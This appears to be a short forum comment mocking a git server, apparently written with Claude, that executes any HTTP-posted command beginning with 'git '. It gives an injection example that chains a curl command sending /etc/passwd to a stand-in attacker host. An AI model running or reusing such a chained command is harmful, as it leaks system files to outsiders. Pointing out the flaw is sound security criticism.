Let's hope Claude doesn't decide to run anything else through that git-server, since it's exec-ing whatever is posted over http.

But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'

https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...